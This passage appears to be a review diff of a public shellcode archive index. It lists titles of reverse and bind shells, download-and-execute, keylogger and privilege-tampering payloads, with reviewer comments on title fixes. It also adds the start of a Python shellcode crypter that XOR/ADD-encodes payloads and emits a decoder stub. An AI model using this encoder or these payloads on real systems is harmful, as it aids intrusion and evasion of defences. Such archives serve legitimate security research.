711 43727 shellcodes/linux_x86/43727.c Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes) Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
712 43728 shellcodes/linux_x86/43728.c Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
713 43729 shellcodes/linux_x86/43729.c Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
714 43730 shellcodes/linux_x86/43730.c Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
715 43731 shellcodes/linux_x86/43731.c Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
716 43732 shellcodes/linux_x86/43732.c Linux/x86 - Egghunter Shellcode (38 bytes) Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
717 40549 43735 shellcodes/windows_x86-64/40549.c shellcodes/linux_x86/43735.c Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6) 2016-10-17 2013-01-01 Roziul Hasan Khan Shifat Geyslan G. Bem shellcode windows_x86-64 linux_x86
718 40560 43736 shellcodes/windows_x86/40560.asm shellcodes/linux_x86/43736.c Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes) 2016-10-17 2013-01-01 Fugu Geyslan G. Bem shellcode windows_x86 linux_x86
719 40781 43737 shellcodes/windows_x86-64/40781.c shellcodes/linux_x86/43737.c Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes) 2016-11-18 2013-01-01 Roziul Hasan Khan Shifat Geyslan G. Bem shellcode windows_x86-64 linux_x86
720 43738 shellcodes/linux_x86/43738.c Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
721 43739 shellcodes/linux_x86/43739.c Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
722 43740 shellcodes/linux_x86/43740.c Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
723 43741 shellcodes/generator/43741.py Linux/x86 - Uzumaki Encryptor Shellcode (Generator) 2013-01-01 Geyslan G. Bem shellcode generator
724 43742 shellcodes/linux_x86/43742.c Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes) 2009-01-01 Russell Willis shellcode linux_x86
725 43743 shellcodes/linux_x86/43743.c Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes) 2009-01-01 Hamid Zamani shellcode linux_x86
726 43744 shellcodes/linux_x86/43744.c Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes) 2013-05-28 Russell Willis shellcode linux_x86
727 43745 shellcodes/linux_x86/43745.c Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes) 2013-07-03 Russell Willis shellcode linux_x86
728 43746 shellcodes/linux_x86/43746.c Linux/x86 - Bind TCP Shell Shellcode (112 bytes) 2013-07-03 Russell Willis shellcode linux_x86
729 43747 shellcodes/linux_x86/43747.c Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes) 2009-01-01 Daniel Sauder shellcode linux_x86
730 43748 shellcodes/linux_x86/43748.c Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes) 2009-01-01 Daniel Sauder shellcode linux_x86
731 43749 shellcodes/linux_x86/43749.asm Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes) 2009-01-01 Paolo Stivanin shellcode linux_x86
732 43750 shellcodes/linux_x86/43750.asm Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes) 2009-01-01 Paolo Stivanin shellcode linux_x86
733 43751 shellcodes/linux_x86/43751.asm Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes) 2009-01-01 Shihao Song shellcode linux_x86
734 43752 shellcodes/linux_x86/43752.asm Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes) 2009-01-01 Paolo Stivanin shellcode linux_x86
735 43753 shellcodes/linux_x86/43753.c Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes) 2014-06-22 Osanda Malith Jayathissa shellcode linux_x86
736 43754 shellcodes/linux_x86/43754.c Linux/x86 - shutdown -h now Shellcode (56 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86
737 43755 shellcodes/linux_x86/43755.c Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes) 2014-07-13 Julien Ahrens shellcode linux_x86
738 43756 shellcodes/linux_x86/43756.c Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes) 2014-07-25 Julien Ahrens shellcode linux_x86
739 43757 shellcodes/linux_x86/43757.c Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes) 2014-05-08 Ali Razmjoo shellcode linux_x86
740 43758 shellcodes/linux_x86/43758.txt Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes) 2009-01-01 Stavros Metzidakis shellcode linux_x86
741 43759 shellcodes/windows_x86/43759.asm Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes) 2009-01-01 H D Moore shellcode windows_x86
742 43760 shellcodes/windows_x86/43760.asm Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes) 2009-01-01 H D Moore shellcode windows_x86
743 43761 shellcodes/windows_x86/43761.asm Windows/x86 - Create Admin User (X) Shellcode (304 bytes) 2009-01-01 H D Moore shellcode windows_x86
744 43762 shellcodes/windows_x86/43762.c Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes) 2009-01-01 OpTix shellcode windows_x86
745 43763 shellcodes/windows_x86/43763.txt Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes) 2009-01-01 Aodrulez shellcode windows_x86
746 43764 shellcodes/windows_x86/43764.c Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes) 2009-01-01 cr4wl3r shellcode windows_x86
747 43765 shellcodes/windows_x86/43765.c Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes) 2009-01-01 agix shellcode windows_x86
748 43766 shellcodes/windows_x86/43766.asm Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes) 2009-01-01 Skylined shellcode windows_x86
749 43767 shellcodes/windows_x86/43767.asm Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes) 2009-01-01 Skylined shellcode windows_x86
750 43768 shellcodes/windows_x86/43768.asm Windows/x86 - Message Box + Null-Free Shellcode (140 bytes) 2009-01-01 Skylined shellcode windows_x86
751 43769 shellcodes/windows_x86/43769.c Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes) 2009-01-01 ZoRLu shellcode windows_x86
752 43770 shellcodes/windows_x86/43770.c Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes) 2009-01-01 ZoRLu shellcode windows_x86
753 43771 shellcodes/windows_x86/43771.c Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes) 2009-01-01 ZoRLu shellcode windows_x86
754 43772 shellcodes/windows_x86/43772.c Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes) 2009-01-01 ZoRLu shellcode windows_x86
755 43773 shellcodes/windows_x86/43773.c Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes) 2010-07-10 John Leitch shellcode windows_x86
756 43774 shellcodes/windows_x86/43774.c Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes) 2009-01-01 d3c0der shellcode windows_x86
757 40549 shellcodes/windows_x86-64/40549.c Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
758 40560 shellcodes/windows_x86/40560.asm Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86
759 40781 shellcodes/windows_x86-64/40781.c Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 2016-11-18 Roziul Hasan Khan Shifat shellcode windows_x86-64
760 40808 shellcodes/linux_x86-64/40808.c Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) 2016-11-22 Ashiyane Digital Security Team shellcode linux_x86-64
761 40821 shellcodes/windows_x86-64/40821.c Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) 2016-11-23 Roziul Hasan Khan Shifat shellcode windows_x86-64
762 40872 shellcodes/linux_x86/40872.c Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) 2016-12-05 Filippo Bersani shellcode linux_x86
763 40924 shellcodes/linux_x86/40924.c Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes) 2016-12-16 Filippo Bersani shellcode linux_x86
764 40981 shellcodes/windows_x86-64/40981.c Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) 2017-01-01 Roziul Hasan Khan Shifat shellcode windows_x86-64
765 41072 shellcodes/windows_x86-64/41072.c Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) 2017-01-15 Roziul Hasan Khan Shifat shellcode windows_x86-64
766 41089 shellcodes/linux_x86-64/41089.c Linux/x86-64 - mkdir Shellcode (25 bytes) Linux/x86-64 - mkdir() Shellcode (25 bytes) 2017-01-18 Ajith Kp shellcode linux_x86-64
767 41128 shellcodes/linux_x86-64/41128.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) 2017-01-19 Ajith Kp shellcode linux_x86-64
768 41174 shellcodes/linux_x86-64/41174.nasm Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) 2017-01-26 Robert L. Taylor shellcode linux_x86-64
769 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode shellcode linux
770 41220 shellcodes/generator/41220.c Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator) 2017-02-02 odzhancode shellcode generator
771 41282 shellcodes/linux_x86/41282.nasm Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes) 2017-02-08 Snir Levi shellcode linux_x86
772 41375 shellcodes/linux/41375.c Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes) 2017-02-16 odzhancode shellcode linux
773 41381 shellcodes/windows_x86/41381.c Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) 2017-02-17 Ege Balci shellcode windows_x86
774 41398 shellcodes/linux_x86-64/41398.nasm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2017-02-19 Robert L. Taylor shellcode linux_x86-64
775 41403 shellcodes/linux_x86/41403.c Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) 2017-02-20 lu0xheap shellcode linux_x86
776 41439 shellcodes/linux_x86-64/41439.c Linux/x86-64 - Egghunter Shellcode (38 bytes) Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) 2017-02-23 odzhancode shellcode linux_x86-64
777 41467 shellcodes/windows_x86/41467.c Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes) 2017-02-26 lu0xheap shellcode windows_x86
778 41468 shellcodes/linux_x86-64/41468.nasm Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode linux_x86-64
779 41477 shellcodes/linux_x86-64/41477.c Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode linux_x86-64
780 41481 shellcodes/windows_x86/41481.asm Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode windows_x86
781 41498 shellcodes/linux_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
782 41503 shellcodes/linux_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
783 41509 shellcodes/linux_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
784 41510 shellcodes/linux_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
785 41581 shellcodes/windows_x86/41581.c Windows x86 - Hide Console Window Shellcode (182 bytes) Windows/x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode windows_x86
786 43433 shellcodes/linux_x86/43433.c Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode linux_x86
787 43476 shellcodes/linux_x86/43476.c Linux/x86 - execve(/bin/dash) Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode linux_x86
788 43480 shellcodes/alpha/43480.c Alpha - /bin/sh Shellcode (80 bytes) 2009-01-01 Lamont Granquist shellcode alpha
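Review bot: the "Reverse TCP" normalisation is applied to row 40872 ("Reverse Netcat + mkfifo" becomes "Reverse TCP Netcat + mkfifo") but not to rows 41509 and 41510, which still read "Reverse Netcat Shell (127.0.0.1:1337)" and "Reverse Netcat Shell (127.0.0.1:1234)". Retitle those two in the same pass so filtering on "Reverse TCP" returns all three. While touching this block, row 41510 also carries the path shellcodes/linux_x86-64/41510.nsam, where every neighbouring assembly file uses .nasm; check whether the file on disk is really named that way.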
804 43512 shellcodes/irix/43512.c IRIX - stdin-read Shellcode (40 bytes) 2009-01-01 scut/teso shellcode irix
805 43520 shellcodes/arm/43520.c Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) 2017-03-31 dummys shellcode arm
806 43530 shellcodes/arm/43530.c Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes) 2015-03-02 Osanda Malith Jayathissa shellcode arm
807 43531 shellcodes/arm/43531.c Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes) Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes) 2013-09-04 gunslinger_ shellcode arm
808 43532 shellcodes/arm/43532.c Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes) 2013-09-04 gunslinger_ shellcode arm
809 43533 shellcodes/arm/43533.c Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes) 2013-09-04 gunslinger_ shellcode arm
810 43534 shellcodes/arm/43534.c Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes) 2010-08-31 Jonathan Salwan shellcode arm
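Review bot: the new title for row 43531, "chmod( /etc/passwd 0777)", has a stray space after the opening parenthesis and loses the separator between the two arguments. The neighbouring rows 43532 to 43534 keep the underscore form, and row 43696 elsewhere in this change uses "chmod(/etc/shadow_ 0666)"; matching that form here would keep the chmod entries consistent.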
815 43545 shellcodes/linux_sparc/43545.c Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes) 2009-01-01 anathema shellcode linux_sparc
816 43541 shellcodes/superh_sh4/43541.c Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes) 2011-06-22 Florian Gaultier shellcode superh_sh4
817 43542 shellcodes/superh_sh4/43542.c Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes) 2009-01-01 Dad_ shellcode superh_sh4
818 43546 shellcodes/linux_sparc/43546.c Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes) Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes) 2009-01-01 Michel Kaempf shellcode linux_sparc
819 43549 shellcodes/linux_x86-64/43549.c Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) 2009-01-01 Dad_ shellcode linux_x86-64
820 43550 shellcodes/linux_x86-64/43550.c Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
821 43551 shellcodes/linux_x86-64/43551.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) 2014-10-29 Osanda Malith Jayathissa shellcode linux_x86-64
822 43552 shellcodes/linux_x86-64/43552.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
823 43553 shellcodes/linux_x86-64/43553.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
824 43554 shellcodes/linux_x86-64/43554.c Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) 2009-01-01 Doreth.Z10 shellcode linux_x86-64
825 43555 shellcodes/linux_x86-64/43555.c Linux/x86-64 - shutdown -h now Shellcode (65 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86-64
826 43556 shellcodes/linux_x86-64/43556.asm Linux/x86-64 - shutdown -h now Shellcode (64 bytes) 2014-09-14 Keyman shellcode linux_x86-64
827 43557 shellcodes/linux_x86-64/43557.asm Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) 2014-09-14 Keyman shellcode linux_x86-64
828 43558 shellcodes/linux_x86-64/43558.asm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) 2014-09-04 Keyman shellcode linux_x86-64
829 43559 shellcodes/linux_x86-64/43559.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) 2014-09-03 Keyman shellcode linux_x86-64
830 43561 shellcodes/linux_x86-64/43561.asm Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) 2014-09-21 Keyman shellcode linux_x86-64
831 41630 shellcodes/linux_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode linux_x86
832 41631 shellcodes/linux_x86/41631.c Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode linux_x86
833 41635 shellcodes/linux_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode linux_x86
834 43734 shellcodes/linux_x86/43734.c Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
835 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
836 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
837 41750 shellcodes/linux_x86-64/41750.txt Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) 2017-03-28 WangYihang shellcode linux_x86-64
838 41757 shellcodes/linux_x86/41757.txt Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4) 2017-03-29 WangYihang shellcode linux_x86
839 41827 shellcodes/windows_x86-64/41827.txt Windows 10 x64 - Egghunter Shellcode (45 bytes) Windows/x86-64 (10) - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode windows_x86-64
840 41883 shellcodes/linux_x86-64/41883.txt Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode linux_x86-64
841 41909 shellcodes/linux_x86/41909.c Linux/x86 - Egghunter Shellcode (18 bytes) Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes) 2017-04-22 phackt_ul shellcode linux_x86
842 41969 shellcodes/linux_x86/41969.c Linux/x86 - Disable ASLR Security Shellcode (80 bytes) 2017-05-08 abatchy17 shellcode linux_x86
843 41970 shellcodes/linux_x86-64/41970.asm Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) 2017-05-08 Srakai shellcode linux_x86-64
844 42016 shellcodes/windows/42016.asm Windows x86/x64 - cmd.exe Shellcode (718 bytes) Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes) 2017-05-17 Filippo Bersani shellcode windows
845 42126 shellcodes/linux_x86-64/42126.c Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) 2017-06-05 Touhid M.Shaikh shellcode linux_x86-64
846 42177 shellcodes/linux_x86/42177.c Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes) 2017-06-15 nullparasite shellcode linux_x86
847 42179 shellcodes/linux_x86-64/42179.c Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) 2017-06-15 m4n3dw0lf shellcode linux_x86-64
848 42208 shellcodes/linux_x86/42208.nasm Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes) 2017-06-20 DONTON Fetenat C shellcode linux_x86
849 42254 shellcodes/linux_x86/42254.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes) 2017-06-26 wetw0rk shellcode linux_x86
850 42339 shellcodes/linux_x86-64/42339.c Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) 2017-07-19 m4n3dw0lf shellcode linux_x86-64
851 42428 shellcodes/linux_x86/42428.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4) 2017-08-06 Touhid M.Shaikh shellcode linux_x86
852 42485 shellcodes/linux_x86-64/42485.c Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) 2017-08-17 Touhid M.Shaikh shellcode linux_x86-64
853 42522 shellcodes/linux_x86-64/42522.c Linux/x86-64 - Kill All Processes Shellcode (19 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
854 42523 shellcodes/linux_x86-64/42523.c Linux/x86-64 - Fork Bomb Shellcode (11 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
855 42594 shellcodes/linux_x86/42594.c Linux/x86 - Fork Bomb Shellcode (9 bytes) 2017-08-30 Touhid M.Shaikh shellcode linux_x86
856 42646 shellcodes/arm/42646.c Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes) 2017-09-10 Andrea Sindoni shellcode arm
857 42647 shellcodes/arm/42647.c Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes) 2017-09-10 Andrea Sindoni shellcode arm
858 42791 shellcodes/linux_x86-64/42791.c Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) Linux/x86-64 - mkdir(evil) Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode linux_x86-64
859 42977 shellcodes/linux_x86/42977.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode linux_x86
860 42992 shellcodes/windows_x86-64/42992.c Windows x64 - API Hooking Shellcode (117 bytes) Windows/x86-64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
861 43463 shellcodes/linux_x86/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux_x86
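Review bot: The row for `shellcodes/linux_x86/41630.asm` carries the misspelling `exceve` in both of its titles (`exceve /bin/sh Encoded` and `exceve(/bin/sh) + Encoded`), so the retitle did not fix it. It should read `execve`, as in the neighbouring rows, or a search on the syscall name will miss the entry.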

shellcodes/generator/43741.py Executable file

@ -0,0 +1,154 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Uzumaki Shellcode Crypter - Python Language
# Copyright (C) 2013 Geyslan G. Bem, Hacking bits
#
# http://hackingbits.com
# geyslan@gmail.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
uzumaki_crypter
* uses the uzumaki cipher, a custom stream cipher algorithm ( (XOR [static] and XOR [pseudorandom]), ADD [static] )
# ./uzumaki_crypter.py -h
# ./uzumaki_crypter.py -a 03 -x f2 -s $'\x31\xc9\xf7\xe1...\x80'
'''
import sys
import getopt
import string
def usage ():
usage = """
-a --add Byte to be used with bitwise ADD (one byte in hex format)
Default is 01
Eg. -a 2f
--add 1f
-x --xor Byte to be used with bitwise XOR (one byte in hex format)
Default is cc
Eg. -x f2
--xor aa
-s --shellcode The shellcode to be crypted with the uzumaki cipher
Eg. -s $'\\xcd\\x80'
--shellcode `printf "\\xcc\\x90"`
-h --help This help
"""
print(usage)
def main():
addByte = "01"
xorByte = "cc"
shellcode = ""
try:
opts, args = getopt.getopt(sys.argv[1:], "ha:x:s:")
except getopt.GetoptError as err:
print(err)
usage()
sys.exit()
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-a", "--add"):
if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
print(" ADD byte has to be in hex format. Eg. -a 3f\n")
sys.exit()
addByte = a
elif o in ("-x", "--xor"):
if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
print(" XOR byte has to be in hex format. Eg. -x f1\n")
sys.exit()
xorByte = a
elif o in ("-s", "--shellcode"):
shellcode = a.encode("utf_8", "surrogateescape")
if (not shellcode):
print(" Is necessary to inform a shellcode. Eg. -s $'\\xcd\\x80'\n")
sys.exit()
crypted = ""
crypted2 = ""
crypted3 = ""
crypted4 = ""
tempbyte = 0x00
for x in range(len(shellcode)):
if (x == 0):
tempbyte = shellcode[x]
else:
tempbyte = ((shellcode[x-1] ^ (shellcode[x] ^ int("0x" + xorByte, 16) )) + int("0x" + addByte, 16))
if (tempbyte > 0xff or tempbyte <= 0x00):
print(" A crypted byte value cannot be higher than 0xff or equal to 0x00. Please change the value of the option 'ADD' or/and of the option 'XOR'.\n")
sys.exit()
crypted += "\\x%02x" % tempbyte
crypted2 = crypted.replace("\\x", ",0x")[1:]
crypted3 += r"\x29\xc9\x74\x14\x5e\xb1"
crypted3 += r"\x%02x" % (len(shellcode) - 1)
